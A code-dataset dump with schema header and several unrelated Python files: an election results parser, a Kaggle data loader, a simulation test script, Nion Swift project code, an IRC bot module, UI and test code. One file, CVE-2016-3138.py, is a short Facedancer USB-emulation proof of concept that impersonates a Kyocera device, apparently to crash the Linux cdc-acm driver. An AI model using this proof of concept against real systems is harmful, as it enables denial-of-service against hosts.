repo_name
stringlengths 5
92
| path
stringlengths 4
232
| copies
stringclasses 19
values | size
stringlengths 4
7
| content
stringlengths 721
1.04M
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 15
997
| alpha_frac
float64 0.25
0.97
| autogenerated
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|
UnitedThruAction/Data | Tools/SuffolkParser.py | 1 | 8507 | """Parse Suffolk County data file and emit OpenElections CSV.
@author [email protected]
@date 2017-07-11
"""
import sys
def parse_information_record(line):
"""Type I. Read and parse information record data."""
information = line[5:].rstrip()
return {'information': information}
def parse_office_record(line):
"""Type R. Read and parse office record data."""
office_title = line[5:45].rstrip()
office_title_std = office_title.replace(',', '')
office_district_type = line[45:46].rstrip()
try:
office_district_number = int(line[46:50])
except ValueError:
office_district_number = ''
if office_district_number == 0:
office_district_number = ''
opp_to_ballot = line[50:51]
num_election_districts = int(line[51:55])
count_eligible_voters = int(line[55:62])
try:
num_candidates = int(line[62:64])
except ValueError:
num_candidates = 0
opp_to_ballot_lookup = {'Y': True,
'N': False,
' ': 'Unknown',
'O': 'Unknown',
'0': 'Unknown',
'2': 'Unknown'}
district_type_lookup = {'U': 'United States',
'N': 'New York State',
'K': 'Suffolk County',
'A': 'Unknown',
'L': 'Unknown',
'T': 'Unknown',
'W': 'Unknown',
'S': 'Unknown',
'J': 'Unknown',
'X': 'Unknown',
'C': 'Unknown'}
return {'office_title': office_title,
'office_title_std': office_title_std,
'office_district_type': district_type_lookup[office_district_type],
'office_district_number': office_district_number,
'opp_to_ballot': opp_to_ballot_lookup[opp_to_ballot],
'num_election_districts': num_election_districts,
'count_eligible_voters': count_eligible_voters,
'num_candidates': num_candidates}
def parse_candidate_record(line):
"""Type C. Read and parse candidate record data."""
candidate_name = line[5:30].rstrip().title()
candidate_name_std = candidate_name
if ', ' in candidate_name:
# Re-order 'Smith, Bob' as 'Bob Smith'
names = candidate_name.split(', ')
candidate_name_std = "{} {}".format(names[1], names[0])
party_code = line[30:33].rstrip()
write_in_flag = line[33:34]
write_in_lookup = {'S': True, ' ': 'Unknown'}
total_votes = int(line[34:41])
row_lever_on_ballot = line[41:44].rstrip()
return {'candidate_name': candidate_name,
'candidate_name_std': candidate_name_std,
'party_code': party_code,
'write_in_flag': write_in_lookup[write_in_flag],
'total_votes': total_votes,
'row_lever_on_ballot': row_lever_on_ballot}
def parse_ed_record(line):
"""Type E. Read ED-result record data."""
record_length = int(line[:4])
town_code = line[5:6]
town_code_lookup = {'0': 'Shelter Island',
'1': 'Brookhaven',
'2': 'Huntington',
'3': 'Islip',
'4': 'Babylon',
'5': 'Smithtown',
'6': 'Southampton',
'7': 'East Hampton',
'8': 'Southold',
'9': 'Riverhead'}
ed_number = int(line[6:9])
reported_status = line[9:10].rstrip()
eligible_voters = int(line[10:14])
try:
whole_number = int(line[14:20])
except ValueError:
whole_number = 0
congress_district = int(line[34:35])
senate_district = int(line[35:36])
assembly_district = int(line[36:38])
legislative_district = int(line[38:40])
towncouncil_district = line[40:42].rstrip()
try:
blank_votes = int(line[42:46])
except ValueError:
blank_votes = 0
void_votes = int(line[46:49])
try:
scattering_votes = int(line[49:52])
except ValueError:
scattering_votes = 0
# Handle variable-length candidate fields
num_candidates = (record_length - 52) / 4
if num_candidates % 1 != 0:
raise ValueError("Incorrect number of characters on line.")
votes = []
try:
for i in range(int(num_candidates)):
start_index = 52 + (4 * i)
end_index = 56 + (4 * i)
votes.append(int(line[start_index:end_index]))
except TypeError as t:
print("Caught TypeError with num_candidates {}, record_length {}, "
"line '{}'".format(num_candidates, record_length, line))
# Generate Suffolk-specific precinct code
precinct_code = "{} #: {:>3}".format(town_code_lookup[town_code].title(),
"{:02.0f}".format(ed_number))
return {'town_name': town_code_lookup[town_code],
'ed_number': ed_number,
'reported_status': reported_status,
'eligible_voters': eligible_voters,
'whole_number': whole_number,
'congress_district': congress_district,
'senate_district': senate_district,
'assembly_district': assembly_district,
'legislative_district': legislative_district,
'towncouncil_district': towncouncil_district,
'blank_votes': blank_votes,
'void_votes': void_votes,
'scattering_votes': scattering_votes,
'num_candidates': num_candidates,
'votes': votes,
'precinct_code': precinct_code}
def process_file(filename):
"""Read the whole file and emit output in standard OE format."""
out_handle = open("{}-output.csv".format(filename), 'w')
out_handle.write('county,precinct,office,district,party,candidate,votes\n')
candidates = None
office = None
in_handle = open(filename, 'r')
for line in in_handle:
if line[4:5] == 'I':
# Information
print(parse_information_record(line))
if line[4:5] == 'R':
# Office
office = parse_office_record(line)
# Reset candidates
candidates = []
if line[4:5] == 'C':
# Candidate
candidates.append(parse_candidate_record(line))
if line[4:5] == 'E':
# ED Breakdown
election_district = parse_ed_record(line)
for i, vote in enumerate(election_district['votes']):
# County
output = ['Suffolk']
# Precinct
output.append(election_district['precinct_code'])
# Office
output.append(office['office_title_std'])
# District
output.append(str(office['office_district_number']))
# Party
try:
output.append(candidates[i]['party_code'])
except IndexError:
output.append('')
# Candidate
try:
output.append(candidates[i]['candidate_name_std'])
except IndexError:
output.append('')
# Votes
output.append(str(vote))
out_handle.write(",".join(output))
out_handle.write("\n")
# Append ED void/scattering votes
special_types = {'Scattering': 'scattering_votes',
'Void': 'void_votes',
'Blank': 'blank_votes'}
for name in special_types:
if election_district[special_types[name]] > 0:
output = ['Suffolk',
election_district['precinct_code'],
office['office_title_std'],
str(office['office_district_number']),
'',
name,
str(election_district[special_types[name]])]
out_handle.write(",".join(output))
out_handle.write("\n")
in_handle.close()
out_handle.close()
if __name__ == "__main__":
if len(sys.argv) < 2:
sys.exit("Provide filename on command-line.")
else:
process_file(sys.argv[1])
| apache-2.0 | -8,484,805,993,741,460,000 | 36.977679 | 79 | 0.508522 | false |
AhmedHani/Kaggle-Machine-Learning-Competitions | Easy/What's Cooking/get_data.py | 1 | 2057 | __author__ = 'Ahmed Hani Ibrahim'
import json
import scipy as sc
import numpy as np
def get_train_data():
with open('./train.json') as r:
data = json.load(r)
r.close()
return data
def get_test_data():
with open('./test.json') as r:
data = json.load(r)
r.close()
return data
def encode_data(data):
labels = [item['cuisine'] for item in data]
unique_labels = set(labels)
labels_dictionary = {}
count = 0
for label in unique_labels:
labels_dictionary[label] = count
count += 1
ingredients = [item['ingredients'] for item in data]
unique_ingredients = set(inner_item for outer_item in ingredients for inner_item in outer_item)
ingredients_dictionary = {}
count = 0
for ingredient in unique_ingredients:
ingredients_dictionary[ingredient] = count
count += 1
return labels, labels_dictionary, ingredients, ingredients_dictionary, data
def vectorize_data(labels, labels_dictionary, ingredients, ingredients_dictionary, data):
labels_list = []
ingredients_list = []
for item in data:
if u'cuisine' in item :
label = str(item[u'cuisine'])
if label in labels_dictionary:
labels_list.append(labels_dictionary[label])
if u'ingredients' in item:
temp_ingredients = item[u'ingredients']
temp_numerical_ingredients = []
for ingredient in temp_ingredients:
if ingredient in ingredients_dictionary:
index = ingredients_dictionary[ingredient]
temp_numerical_ingredients.append(index)
ingredients_list.append(temp_numerical_ingredients)
print(len(ingredients_list), len(labels_list))
return (np.array(ingredients_list), np.array(labels_list))
#labels, labels_dictionary, ingredients, ingredients_dictionary, data = encode_data(get_train_data())
#features, classes = vectorize_data(labels, labels_dictionary, ingredients, ingredients_dictionary, data)
| mit | 2,965,865,717,847,519,000 | 27.971831 | 105 | 0.644628 | false |
qiqi/fds | tests/test_autonomous_system/test_vida_automomous_system.py | 1 | 1891 | import os
import sys
import shutil
import string
import subprocess
from numpy import *
my_path = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.join(my_path, '../..'))
from fds.cti_restart_io import *
ref_fname = os.path.join(my_path, '..', 'data', 'cti-sample-restart-file.les')
initial_state = load_les(ref_fname, verbose=True)
base_dir = os.path.join(my_path, 'vida')
def run_vida_in(run_dir, state, steps):
print('Running {0} steps'.format(steps))
os.mkdir(run_dir)
template = open(os.path.join(my_path, 'vida.template')).read()
template = string.Template(template)
fname = os.path.join(run_dir, 'initial.les')
shutil.copy(ref_fname, fname)
state['STEP'] = 1
save_les(fname, state, verbose=True)
with open(os.path.join(run_dir, 'vida.in'), 'w') as f:
f.write(template.substitute(NSTEPS=str(steps+1)))
with open(os.path.join(run_dir, 'vida.out'), 'w') as f:
subprocess.check_call('/home/qiqi/BulletBody-ref/vida.exe',
cwd=run_dir, stdout=f, stderr=f)
fname = os.path.join(run_dir, 'result.les')
return load_les(fname, verbose=True)
if __name__ == '__main__':
if os.path.exists(base_dir):
shutil.rmtree(base_dir)
os.mkdir(base_dir)
intermediate_state = run_vida_in(os.path.join(base_dir, 'first_50_steps'),
initial_state, 50)
final_state_1 = run_vida_in(os.path.join(base_dir, 'second_50_steps'),
intermediate_state, 50)
final_state_2 = run_vida_in(os.path.join(base_dir, 'all_100_steps_at_once'),
initial_state, 100)
for k in final_state_1:
if k != 'STEP':
if (final_state_1[k] == final_state_2[k]).all():
print(k, ' matches')
else:
print(k, ' does not match')
| gpl-3.0 | 3,876,874,120,806,105,000 | 36.82 | 80 | 0.586991 | false |
sga001/cinch | exploits/CVE-2016-3138.py | 1 | 1952 | #!/usr/bin/env python3
from USB import *
from USBDevice import *
from USBConfiguration import *
from USBInterface import *
from USBEndpoint import *
class PwnUSBDevice(USBDevice):
name = "USB device"
def handle_buffer_available(self, lll):
return
def __init__(self, maxusb_app, verbose=0):
interface = USBInterface(
0, # interface number
0, # alternate setting
255, # interface class
0, # subclass
0, # protocol
0, # string index
verbose,
[],
{}
)
config = USBConfiguration(
1, # index
"Emulated Device", # string desc
[ interface ] # interfaces
)
USBDevice.__init__(
self,
maxusb_app,
0, # device class
0, # device subclass
0, # protocol release number
64, # max packet size for endpoint 0
0x0482, # vendor id
0x0203, # product id
0, # device revision
"Kyocera Corp.", # manufacturer string
"AH-K3001V", # product string
"?", # serial number string
[ config ],
verbose=verbose
)
from Facedancer import *
from MAXUSBApp import *
sp = GoodFETSerialPort()
fd = Facedancer(sp, verbose=1)
u = MAXUSBApp(fd, verbose=1)
d = PwnUSBDevice(u, verbose=4)
d.connect()
try:
d.run()
except KeyboardInterrupt:
d.disconnect()
| cc0-1.0 | 1,698,712,239,874,196,700 | 28.575758 | 72 | 0.412398 | false |
nion-software/nionswift | nion/swift/model/Project.py | 1 | 19701 | # standard libraries
import functools
import logging
import pathlib
import typing
import uuid
import weakref
# local libraries
from nion.swift.model import Changes
from nion.swift.model import Connection
from nion.swift.model import DataGroup
from nion.swift.model import Symbolic
from nion.swift.model import DataItem
from nion.swift.model import DataStructure
from nion.swift.model import DisplayItem
from nion.swift.model import FileStorageSystem
from nion.swift.model import Persistence
from nion.swift.model import WorkspaceLayout
from nion.utils import Converter
from nion.utils import ListModel
from nion.utils import Observable
ProjectItemType = typing.Union[DataItem.DataItem, DisplayItem.DisplayItem, DataStructure.DataStructure, Connection.Connection, Symbolic.Computation]
class Project(Observable.Observable, Persistence.PersistentObject):
"""A project manages raw data items, display items, computations, data structures, and connections.
Projects are stored in project indexes, which are files that describe how to find data and and tracks the other
project relationships (display items, computations, data structures, connections).
Projects manage reading, writing, and data migration.
"""
PROJECT_VERSION = 3
_processing_descriptions = dict()
def __init__(self, storage_system: FileStorageSystem.ProjectStorageSystem):
super().__init__()
self.define_type("project")
self.define_property("title", str())
self.define_relationship("data_items", data_item_factory, insert=self.__data_item_inserted, remove=self.__data_item_removed)
self.define_relationship("display_items", display_item_factory, insert=self.__display_item_inserted, remove=self.__display_item_removed)
self.define_relationship("computations", computation_factory, insert=self.__computation_inserted, remove=self.__computation_removed)
self.define_relationship("data_structures", data_structure_factory, insert=self.__data_structure_inserted, remove=self.__data_structure_removed)
self.define_relationship("connections", Connection.connection_factory, insert=self.__connection_inserted, remove=self.__connection_removed)
self.define_relationship("data_groups", DataGroup.data_group_factory, insert=self.__data_group_inserted, remove=self.__data_group_removed)
self.define_relationship("workspaces", WorkspaceLayout.factory)
self.define_property("workspace_uuid", converter=Converter.UuidToStringConverter())
self.define_property("data_item_references", dict(), hidden=True, changed=self.__property_changed) # map string key to data item, used for data acquisition channels
self.define_property("mapped_items", list(), changed=self.__property_changed) # list of item references, used for shortcut variables in scripts
self.handle_start_read = None
self.handle_insert_model_item = None
self.handle_remove_model_item = None
self.handle_finish_read = None
self.__has_been_read = False
self._raw_properties = None # debugging
self.__storage_system = storage_system
self.set_storage_system(self.__storage_system)
def close(self) -> None:
self.handle_start_read = None
self.handle_insert_model_item = None
self.handle_remove_model_item = None
self.handle_finish_read = None
self.__storage_system.close()
self.__storage_system = None
super().close()
def open(self) -> None:
self.__storage_system.reset() # this makes storage reusable during tests
def create_proxy(self) -> Persistence.PersistentObjectProxy:
return self.container.create_item_proxy(item=self)
@property
def item_specifier(self) -> Persistence.PersistentObjectSpecifier:
return Persistence.PersistentObjectSpecifier(item_uuid=self.uuid)
def create_specifier(self, item: Persistence.PersistentObject) -> Persistence.PersistentObjectSpecifier:
return Persistence.PersistentObjectSpecifier(item=item)
def insert_model_item(self, container, name, before_index, item) -> None:
# special handling to pass on to the document model
assert callable(self.handle_insert_model_item)
self.handle_insert_model_item(container, name, before_index, item)
def remove_model_item(self, container, name, item, *, safe: bool=False) -> Changes.UndeleteLog:
# special handling to pass on to the document model
assert callable(self.handle_remove_model_item)
return self.handle_remove_model_item(container, name, item, safe=safe)
@property
def storage_system_path(self) -> pathlib.Path:
return pathlib.Path(self.__storage_system.get_identifier())
@property
def project_uuid(self) -> typing.Optional[uuid.UUID]:
properties = self.__storage_system.get_storage_properties()
try:
return uuid.UUID(properties.get("uuid", str(uuid.uuid4()))) if properties else None
except Exception:
return None
@property
def project_state(self) -> str:
project_uuid = self.project_uuid
project_version = self.project_version
if project_uuid is not None and project_version is not None:
if project_version == FileStorageSystem.PROJECT_VERSION:
return "loaded" if self.__has_been_read else "unloaded"
else:
return "needs_upgrade"
return "invalid"
@property
def project_version(self) -> typing.Optional[int]:
properties = self.__storage_system.get_storage_properties()
try:
return properties.get("version", None) if properties else None
except Exception:
return None
@property
def project_filter(self) -> ListModel.Filter:
def is_display_item_active(project_weak_ref, display_item: DisplayItem.DisplayItem) -> bool:
return display_item.project == project_weak_ref()
# use a weak reference to avoid circular references loops that prevent garbage collection
return ListModel.PredicateFilter(functools.partial(is_display_item_active, weakref.ref(self)))
@property
def project_storage_system(self) -> FileStorageSystem.ProjectStorageSystem:
return self.__storage_system
def __data_item_inserted(self, name: str, before_index: int, data_item: DataItem.DataItem) -> None:
self.notify_insert_item("data_items", data_item, before_index)
def __data_item_removed(self, name: str, index: int, data_item: DataItem.DataItem) -> None:
self.notify_remove_item("data_items", data_item, index)
def __display_item_inserted(self, name: str, before_index: int, display_item: DisplayItem.DisplayItem) -> None:
self.notify_insert_item("display_items", display_item, before_index)
def __display_item_removed(self, name: str, index: int, display_item: DisplayItem.DisplayItem) -> None:
self.notify_remove_item("display_items", display_item, index)
def __data_structure_inserted(self, name: str, before_index: int, data_structure: DataStructure.DataStructure) -> None:
self.notify_insert_item("data_structures", data_structure, before_index)
def __data_structure_removed(self, name: str, index: int, data_structure: DataStructure.DataStructure) -> None:
self.notify_remove_item("data_structures", data_structure, index)
def __computation_inserted(self, name: str, before_index: int, computation: Symbolic.Computation) -> None:
self.notify_insert_item("computations", computation, before_index)
def __computation_removed(self, name: str, index: int, computation: Symbolic.Computation) -> None:
self.notify_remove_item("computations", computation, index)
def __connection_inserted(self, name: str, before_index: int, connection: Connection.Connection) -> None:
self.notify_insert_item("connections", connection, before_index)
def __connection_removed(self, name: str, index: int, connection: Connection.Connection) -> None:
self.notify_remove_item("connections", connection, index)
def __data_group_inserted(self, name: str, before_index: int, data_group: DataGroup.DataGroup) -> None:
self.notify_insert_item("data_groups", data_group, before_index)
def __data_group_removed(self, name: str, index: int, data_group: DataGroup.DataGroup) -> None:
self.notify_remove_item("data_groups", data_group, index)
def _get_relationship_persistent_dict(self, item, key: str, index: int) -> typing.Dict:
if key == "data_items":
return self.__storage_system.get_persistent_dict("data_items", item.uuid)
else:
return super()._get_relationship_persistent_dict(item, key, index)
def _get_relationship_persistent_dict_by_uuid(self, item, key: str) -> typing.Optional[typing.Dict]:
if key == "data_items":
return self.__storage_system.get_persistent_dict("data_items", item.uuid)
else:
return super()._get_relationship_persistent_dict_by_uuid(item, key)
def prepare_read_project(self) -> None:
logging.getLogger("loader").info(f"Loading project {self.__storage_system.get_identifier()}")
self._raw_properties = self.__storage_system.read_project_properties() # combines library and data item properties
self.uuid = uuid.UUID(self._raw_properties.get("uuid", str(uuid.uuid4())))
def read_project(self) -> None:
if callable(self.handle_start_read):
self.handle_start_read()
properties = self._raw_properties
if properties:
project_version = properties.get("version", None)
if project_version is not None and project_version == FileStorageSystem.PROJECT_VERSION:
for item_d in properties.get("data_items", list()):
data_item = DataItem.DataItem()
data_item.begin_reading()
data_item.read_from_dict(item_d)
data_item.finish_reading()
if not self.get_item_by_uuid("data_items", data_item.uuid):
self.load_item("data_items", len(self.data_items), data_item)
else:
data_item.close()
for item_d in properties.get("display_items", list()):
display_item = DisplayItem.DisplayItem()
display_item.begin_reading()
display_item.read_from_dict(item_d)
display_item.finish_reading()
if not self.get_item_by_uuid("display_items", display_item.uuid):
self.load_item("display_items", len(self.display_items), display_item)
else:
display_item.close()
for item_d in properties.get("data_structures", list()):
data_structure = DataStructure.DataStructure()
data_structure.begin_reading()
data_structure.read_from_dict(item_d)
data_structure.finish_reading()
if not self.get_item_by_uuid("data_structures", data_structure.uuid):
self.load_item("data_structures", len(self.data_structures), data_structure)
else:
data_structure.close()
for item_d in properties.get("computations", list()):
computation = Symbolic.Computation()
computation.begin_reading()
computation.read_from_dict(item_d)
computation.finish_reading()
if not self.get_item_by_uuid("computations", computation.uuid):
self.load_item("computations", len(self.computations), computation)
# TODO: handle update script and bind after reload in document model
computation.update_script(Project._processing_descriptions)
computation.reset()
else:
computation.close()
for item_d in properties.get("connections", list()):
connection = Connection.connection_factory(item_d.get)
connection.begin_reading()
connection.read_from_dict(item_d)
connection.finish_reading()
if not self.get_item_by_uuid("connections", connection.uuid):
self.load_item("connections", len(self.connections), connection)
else:
connection.close()
for item_d in properties.get("data_groups", list()):
data_group = DataGroup.data_group_factory(item_d.get)
data_group.begin_reading()
data_group.read_from_dict(item_d)
data_group.finish_reading()
if not self.get_item_by_uuid("data_groups", data_group.uuid):
self.load_item("data_groups", len(self.data_groups), data_group)
else:
data_group.close()
for item_d in properties.get("workspaces", list()):
workspace = WorkspaceLayout.factory(item_d.get)
workspace.begin_reading()
workspace.read_from_dict(item_d)
workspace.finish_reading()
if not self.get_item_by_uuid("workspaces", workspace.uuid):
self.load_item("workspaces", len(self.workspaces), workspace)
else:
workspace.close()
workspace_uuid_str = properties.get("workspace_uuid", None)
if workspace_uuid_str:
self._set_persistent_property_value("workspace_uuid", uuid.UUID(workspace_uuid_str))
self._set_persistent_property_value("data_item_references", properties.get("data_item_references", dict()))
self._set_persistent_property_value("mapped_items", properties.get("mapped_items", list()))
self.__has_been_read = True
if callable(self.handle_finish_read):
self.handle_finish_read()
def __property_changed(self, name, value):
self.notify_property_changed(name)
def append_data_item(self, data_item: DataItem.DataItem) -> None:
assert not self.get_item_by_uuid("data_items", data_item.uuid)
self.append_item("data_items", data_item)
data_item.write_data_if_not_delayed() # initially write to disk
def remove_data_item(self, data_item: DataItem.DataItem) -> None:
self.remove_item("data_items", data_item)
def restore_data_item(self, data_item_uuid: uuid.UUID) -> typing.Optional[DataItem.DataItem]:
item_d = self.__storage_system.restore_item(data_item_uuid)
if item_d is not None:
data_item_uuid = uuid.UUID(item_d.get("uuid"))
large_format = item_d.get("__large_format", False)
data_item = DataItem.DataItem(item_uuid=data_item_uuid, large_format=large_format)
data_item.begin_reading()
data_item.read_from_dict(item_d)
data_item.finish_reading()
assert not self.get_item_by_uuid("data_items", data_item.uuid)
self.append_item("data_items", data_item)
assert data_item.container == self
return data_item
return None
def append_display_item(self, display_item: DisplayItem.DisplayItem) -> None:
assert not self.get_item_by_uuid("display_items", display_item.uuid)
self.append_item("display_items", display_item)
def remove_display_item(self, display_item: DisplayItem.DisplayItem) -> None:
self.remove_item("display_items", display_item)
def append_data_structure(self, data_structure: DataStructure.DataStructure) -> None:
assert not self.get_item_by_uuid("data_structures", data_structure.uuid)
self.append_item("data_structures", data_structure)
def remove_data_structure(self, data_structure: DataStructure.DataStructure) -> None:
self.remove_item("data_structures", data_structure)
def append_computation(self, computation: Symbolic.Computation) -> None:
assert not self.get_item_by_uuid("computations", computation.uuid)
self.append_item("computations", computation)
def remove_computation(self, computation: Symbolic.Computation) -> None:
self.remove_item("computations", computation)
def append_connection(self, connection: Connection.Connection) -> None:
assert not self.get_item_by_uuid("connections", connection.uuid)
self.append_item("connections", connection)
def remove_connection(self, connection: Connection.Connection) -> None:
self.remove_item("connections", connection)
@property
def data_item_references(self) -> typing.Dict[str, uuid.UUID]:
return dict(self._get_persistent_property_value("data_item_references").items())
def set_data_item_reference(self, key: str, data_item: DataItem.DataItem) -> None:
data_item_references = self.data_item_references
data_item_references[key] = data_item.item_specifier.write()
self._set_persistent_property_value("data_item_references", {k: v for k, v in data_item_references.items()})
def clear_data_item_reference(self, key: str) -> None:
data_item_references = self.data_item_references
del data_item_references[key]
self._set_persistent_property_value("data_item_references", {k: v for k, v in data_item_references.items()})
@property
def mapped_items(self) -> typing.List[typing.Union[typing.Mapping, str]]:
return list(self._get_persistent_property_value("mapped_items"))
@mapped_items.setter
def mapped_items(self, value: typing.List[typing.Union[typing.Mapping, str]]) -> None:
self._set_persistent_property_value("mapped_items", value)
def prune(self) -> None:
self.__storage_system.prune()
def migrate_to_latest(self) -> None:
self.__storage_system.migrate_to_latest()
self.__storage_system.load_properties()
self.update_storage_system() # reload the properties
self.prepare_read_project()
self.read_project()
def unmount(self) -> None:
while len(self.data_groups) > 0:
self.unload_item("data_groups", len(self.data_groups) - 1)
while len(self.connections) > 0:
self.unload_item("connections", len(self.connections) - 1)
while len(self.computations) > 0:
self.unload_item("computations", len(self.computations) - 1)
while len(self.data_structures) > 0:
self.unload_item("data_structures", len(self.data_structures) - 1)
while len(self.display_items) > 0:
self.unload_item("display_items", len(self.display_items) - 1)
while len(self.data_items) > 0:
self.unload_item("data_items", len(self.data_items) - 1)
def data_item_factory(lookup_id):
data_item_uuid = uuid.UUID(lookup_id("uuid"))
large_format = lookup_id("__large_format", False)
return DataItem.DataItem(item_uuid=data_item_uuid, large_format=large_format)
def display_item_factory(lookup_id):
display_item_uuid = uuid.UUID(lookup_id("uuid"))
return DisplayItem.DisplayItem(item_uuid=display_item_uuid)
def computation_factory(lookup_id):
return Symbolic.Computation()
def data_structure_factory(lookup_id):
return DataStructure.DataStructure()
| gpl-3.0 | 7,469,101,055,885,551,000 | 48.5 | 173 | 0.649662 | false |
richrd/bx | modules/autochanmode.py | 1 | 1311 | from mod_base import*
class AutoChanMode(Listener):
"""Automatically manage channel modes according to config."""
def init(self):
self.events = [
IRC_EVT_CHAN_USER_MODE_CHANGE,
IRC_EVT_CHAN_MODE_CHANGE,
]
self.all_modes = "cCDilmMnNoprstTuv"
def RepairModes(self, event):
if event.id == IRC_EVT_CHAN_MODE_CHANGE and event.user == self.bot.me:
return False
valid = self.bot.config.GetChannelModes(event.win)
if valid == None:
return False
del_modes = self.all_modes
for mode in valid:
del_modes = del_modes.replace(mode, "")
event.win.SetModes("-" + del_modes)
event.win.SetModes(valid)
def event(self, event):
m = self.bot.config.GetChannelModes(event.win)
if m == None:
return False
if event.id == IRC_EVT_CHAN_MODE_CHANGE:
if self.bot.me.HasOP(event.win):
self.RepairModes(event)
if event.id == IRC_EVT_CHAN_USER_MODE_CHANGE:
if event.user == self.bot.me:
if self.bot.me.HasOP(event.win):
self.RepairModes(event)
module = {
"class": AutoChanMode,
"type": MOD_LISTENER,
} | apache-2.0 | 7,036,446,650,438,043,000 | 30.238095 | 78 | 0.546911 | false |
vertelab/odoo-payroll | hr_weekly_working_hours/__openerp__.py | 1 | 1272 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution, third party addon
# Copyright (C) 2016- Vertel AB (<http://vertel.se>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Weekly Working Hours',
'version': '0.1',
'summary': 'Adds Weekly working hours fields to hr.contract.',
'category': 'hr',
'description': """""",
'author': 'Vertel AB',
'license': 'AGPL-3',
'website': 'http://www.vertel.se',
'depends': ['hr_contract'],
'data': ['hr_view.xml'],
'installable': True,
}
| gpl-3.0 | 2,739,661,375,236,349,400 | 37.545455 | 78 | 0.621069 | false |
mompiou/stereo-proj | schmidUI.py | 1 | 3558 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'schmidUI.ui'
#
# Created by: PyQt4 UI code generator 4.12.1
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Schmid(object):
def setupUi(self, Schmid):
Schmid.setObjectName(_fromUtf8("Schmid"))
Schmid.resize(343, 320)
self.layoutWidget = QtGui.QWidget(Schmid)
self.layoutWidget.setGeometry(QtCore.QRect(10, 10, 318, 298))
self.layoutWidget.setObjectName(_fromUtf8("layoutWidget"))
self.gridLayout = QtGui.QGridLayout(self.layoutWidget)
self.gridLayout.setMargin(0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.schmid_text = QtGui.QTextEdit(self.layoutWidget)
self.schmid_text.setObjectName(_fromUtf8("schmid_text"))
self.gridLayout.addWidget(self.schmid_text, 6, 0, 1, 3)
self.b_label = QtGui.QLabel(self.layoutWidget)
self.b_label.setObjectName(_fromUtf8("b_label"))
self.gridLayout.addWidget(self.b_label, 0, 0, 1, 1)
self.buttonBox = QtGui.QDialogButtonBox(self.layoutWidget)
self.buttonBox.setStandardButtons(QtGui.QDialogButtonBox.Cancel|QtGui.QDialogButtonBox.Ok)
self.buttonBox.setObjectName(_fromUtf8("buttonBox"))
self.gridLayout.addWidget(self.buttonBox, 7, 0, 1, 2)
self.T_label = QtGui.QLabel(self.layoutWidget)
self.T_label.setObjectName(_fromUtf8("T_label"))
self.gridLayout.addWidget(self.T_label, 3, 0, 1, 1)
self.b_entry = QtGui.QLineEdit(self.layoutWidget)
self.b_entry.setObjectName(_fromUtf8("b_entry"))
self.gridLayout.addWidget(self.b_entry, 0, 1, 1, 1)
self.T_entry = QtGui.QLineEdit(self.layoutWidget)
self.T_entry.setObjectName(_fromUtf8("T_entry"))
self.gridLayout.addWidget(self.T_entry, 3, 1, 1, 1)
self.n_entry = QtGui.QLineEdit(self.layoutWidget)
self.n_entry.setObjectName(_fromUtf8("n_entry"))
self.gridLayout.addWidget(self.n_entry, 2, 1, 1, 1)
self.n_label = QtGui.QLabel(self.layoutWidget)
self.n_label.setObjectName(_fromUtf8("n_label"))
self.gridLayout.addWidget(self.n_label, 2, 0, 1, 1)
self.schmid_factor_label = QtGui.QLabel(self.layoutWidget)
self.schmid_factor_label.setText(_fromUtf8(""))
self.schmid_factor_label.setObjectName(_fromUtf8("schmid_factor_label"))
self.gridLayout.addWidget(self.schmid_factor_label, 4, 1, 1, 1)
self.retranslateUi(Schmid)
QtCore.QMetaObject.connectSlotsByName(Schmid)
Schmid.setTabOrder(self.b_entry, self.n_entry)
Schmid.setTabOrder(self.n_entry, self.T_entry)
Schmid.setTabOrder(self.T_entry, self.schmid_text)
Schmid.setTabOrder(self.schmid_text, self.buttonBox)
def retranslateUi(self, Schmid):
Schmid.setWindowTitle(_translate("Schmid", "Schmid Factor", None))
self.b_label.setText(_translate("Schmid", "b", None))
self.T_label.setText(_translate("Schmid", "T", None))
self.n_label.setText(_translate("Schmid", "n", None))
| gpl-2.0 | -1,922,772,828,520,830,500 | 45.207792 | 98 | 0.681001 | false |
elifesciences/builder | src/tests/test_buildercore_utils.py | 1 | 6605 | from . import base
from functools import partial
from buildercore import utils
from mock import patch, MagicMock
import logging
LOG = logging.getLogger(__name__)
class Simple(base.BaseCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_ordered_dump(self):
case_list = [
("1", "'1'\n"),
({}, "{}\n"),
# simple bytestrings are treated as regular strings
(b"1", "'1'\n"),
]
self.assertAllPairsEqual(utils.ordered_dump, case_list)
def test_shallow_flatten(self):
case_list = [
([], []),
([[1], [2], [3]], [1, 2, 3]),
([[[1]], [2], [3]], [[1], 2, 3]),
([[None]], [None]),
]
for given, expected in case_list:
self.assertEqual(utils.shallow_flatten(given), expected)
def test_isint(self):
expected_true = [
1, 0, -1,
"1", "0", "-1"
]
self.assertAllTrue(utils.isint, expected_true)
def test_isstr(self):
expected_true = [''] if utils.gtpy2() else ['', r'', u'']
self.assertAllTrue(utils.isstr, expected_true)
def test_nth(self):
expected_vals = [
('a', 0, 'a'),
('ab', 0, 'a'),
('ab', 1, 'b'),
('abc', 2, 'c'),
([1, 2, 3], 0, 1),
([1, 2, 3], 1, 2),
]
for data, n, expected in expected_vals:
self.assertEqual(expected, utils.nth(data, n))
